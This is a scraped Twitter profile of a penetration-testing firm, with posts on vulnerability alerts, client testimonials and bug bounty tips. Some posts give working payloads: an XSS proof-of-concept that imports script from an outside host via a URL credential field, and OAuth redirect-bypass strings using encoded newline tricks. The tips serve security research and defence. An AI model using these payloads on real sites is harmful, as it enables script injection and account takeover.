Team Bounters (@teambounters) 's Twitter Profile
Team Bounters

@teambounters

Securing Every Bit 🛡️ | #vapt services | #appsec training | Live hacking session | Community for Ethical Hackers #infosec #bugbounty #hacking #appsec #security

ID: 1040280505332256774

linkhttps://teambounters.com calendar_today13-09-2018 16:46:14

79 Tweet

242 Followers

47 Following

Team Bounters (@teambounters) 's Twitter Profile Photo

🚨 Critical Security Alert 🚨 Vulnerability in parse-server exposes systems to Denial of Service and Arbitrary Code Execution via manipulated Cloud Function and Cloud Job names. Immediate action required! Refer to: shorturl.at/yzGO2 #SecurityAlert #vapt #DoS

smaury (@smaury92) 's Twitter Profile Photo

👋🏿 hackers! I'm looking for an #AppSec 🥷🏿/🧙🏿 to join our team at Shielder! If you are looking for a chill company which will invest in you and give you paid #research time, please hit me up! #hiring #vr More info ⬇️ (RT appreciated) romhack.io/job-opportunit…

ӉѦСҠіИԌ ҬЄѦӍ (@hackingteam777) 's Twitter Profile Photo

JSNinja - Hunting Bugs in JavaScript! JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. Github #tools #hunting

JSNinja - Hunting Bugs in JavaScript!

JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files.

Github 

#tools #hunting
Jayesh Madnani (@jayesh25_) 's Twitter Profile Photo

💰Bug Bounty Tips: Scored a $5,000 bounty via APIs exposed on a Swagger endpoint! 💻 Discovered a Swagger UI showing API endpoints—all endpoints required auth. Instead of stopping there, I tried something different: using an Authorization token and cookies from a different

💰Bug Bounty Tips: Scored a $5,000 bounty via APIs exposed on a Swagger endpoint! 💻

Discovered a Swagger UI showing API endpoints—all endpoints required auth. Instead of stopping there, I tried something different: using an Authorization token and cookies from a different
Team Bounters (@teambounters) 's Twitter Profile Photo

Grateful for the incredible energy and insights shared during our recent cybersecurity meetup! Great discussions, hands-on learning, and community bonding. #bugbounty #cybersecurity #TeamBounters

Grateful for the incredible energy and insights shared during our recent cybersecurity meetup! 
Great discussions, hands-on learning, and community bonding. 
#bugbounty #cybersecurity #TeamBounters
Team Bounters (@teambounters) 's Twitter Profile Photo

We at Team Bounters help organizations protect their digital assets and strengthen their security posture. Contact us today to stay ahead of cyber threats. #cybersecurity #pentesting #infosec #vapt

We at <a href="/TeamBounters/">Team Bounters</a> help organizations protect their digital assets and strengthen their security posture.
Contact us today to stay ahead of cyber threats.

#cybersecurity #pentesting #infosec #vapt
Team Bounters (@teambounters) 's Twitter Profile Photo

This could be a great resource for security researchers looking to expand their skills in reverse engineering. What other learning platforms do you recommend? Drop your suggestions in the comments! 👇 #bugbounty #hacking #bugbountytips #cybersecuritytips #infosec

This could be a great resource for security researchers looking to expand their skills in reverse engineering. 

What other learning platforms do you recommend? Drop your suggestions in the comments! 👇

#bugbounty  #hacking #bugbountytips #cybersecuritytips #infosec
Team Bounters (@teambounters) 's Twitter Profile Photo

They had already done a pentest. from a big name vendor. But we still found: - A critical Account Takeover - Broken access control flaws - Business logic bugs their previous vendor missed #vapt #BugBounty #Pentesting #Hacking

They had already done a pentest. from a big name vendor.
But we still found:
- A critical Account Takeover
- Broken access control flaws
- Business logic bugs their previous vendor missed

#vapt #BugBounty #Pentesting #Hacking
Team Bounters (@teambounters) 's Twitter Profile Photo

🚨 1 Hour Critical Find – Java Deserialization In just 60 minutes, we uncovered a critical vuln. No luck. Just TeamBounters mindset: deep logic analysis + custom recon tools. Real pentesting. Real results. #Cybersecurity #VAPT #BugBounty #TeamBounters #Pentesting

Nagli (@galnagli) 's Twitter Profile Photo

I hacked a popular vibe coding platform with a simple, straight-forward logic flaw - allowing access to private applications . Here’s how I did it 🧵

I hacked a popular vibe coding platform with a simple, straight-forward logic flaw - allowing access to private applications . Here’s how I did it 🧵
Team Bounters (@teambounters) 's Twitter Profile Photo

We just wrapped a VAPT engagement and the client's words say it all: “Smooth, effective, and deeply knowledgeable.” Looking to level up your app, API, or infra security? 📩 [email protected] #CyberSecurity #VAPT #AppSec #TeamBounters #Infosec #pentest

We just wrapped a VAPT engagement and the client's words say it all:

“Smooth, effective, and deeply knowledgeable.”
Looking to level up your app, API, or infra security?

📩 contactus@teambounters.com

#CyberSecurity #VAPT #AppSec #TeamBounters #Infosec #pentest
Mr.Hacker (@mr_hacker0007) 's Twitter Profile Photo

Just finished a web VAPT for an e-com client. They’d already done 2 rounds before… we still pulled out a payment bypass + PII disclosure Client shocked Team Bounters rocked! #VAPT #infosec #BugBounty #CyberSecurity #pentest

Mr.Hacker (@mr_hacker0007) 's Twitter Profile Photo

#bugbountytips found during a pentest: inconsistent escaping in URL credential fields. Example: lol.com'-aa-' got escaped after @ but not before. PoC payload: https://'-import('https:lol.com')-'WWW.example.com #BugBounty #XSS #VAPT #TeamBounters

Team Bounters (@teambounters) 's Twitter Profile Photo

A clever Oauth Redirect Bypass by Mr.Hacker on #bugbountytips It's a great reminder, always whitelist your redirect URIs strictly... #pentesting #hacking #vapt #teambounters

Team Bounters (@teambounters) 's Twitter Profile Photo

We're incredibly proud to share this recent feedback from our client following their VAPT. It confirms our commitment to being more than just a vendor. This is why we do what we do. Thank you for the shout out! Securing Every Bit. #vapt #pentest #cybersecurity #bugbountytips

We're incredibly proud to share this recent feedback from our client following their VAPT. It confirms our commitment to being more than just a vendor. 

This is why we do what we do. Thank you for the shout out! Securing Every Bit.

#vapt #pentest #cybersecurity #bugbountytips
Team Bounters (@teambounters) 's Twitter Profile Photo

🚨 Critical RCE Alert — WSUS Servers 🚨 CVE-2025-59287 (CVSS 9.8) allows unauthenticated remote attackers to gain SYSTEM access via a deserialization flaw. Potentially wormable across WSUS instances. ➡️ Patch immediately! #BugBounty #CyberSecurity #TeamBounters #PenTesting

🚨 Critical RCE Alert — WSUS Servers 🚨

CVE-2025-59287 (CVSS 9.8) allows unauthenticated remote attackers to gain SYSTEM access via a deserialization flaw.

Potentially wormable across WSUS instances.
➡️ Patch immediately!

#BugBounty #CyberSecurity #TeamBounters #PenTesting
Team Bounters (@teambounters) 's Twitter Profile Photo

🔐 OAuth Redirect Tricks That Still Catch Many Apps Off Guard A few examples: https://lol .com\@x.com //example .com%0a%23.lol.com //example .com%0a%2523.lol.com #bugbountytips #appsec #InfoSec

🔐 OAuth Redirect Tricks That Still Catch Many Apps Off Guard  

A few examples:
https://lol .com\@x.com
//example .com%0a%23.lol.com
//example .com%0a%2523.lol.com
 
#bugbountytips #appsec #InfoSec
Team Bounters (@teambounters) 's Twitter Profile Photo

🚨 XXE Payloads & WAF Bypass 🚨 This cheatsheet highlights XXE bypass techniques we still see working during penetration tests and bug hunting: #bugbountytips #appsec #infosec #CybersecurityNews #teambounters

🚨 XXE Payloads &amp; WAF Bypass 🚨

This cheatsheet highlights XXE bypass techniques we still see working during penetration tests and bug hunting:

#bugbountytips #appsec #infosec #CybersecurityNews #teambounters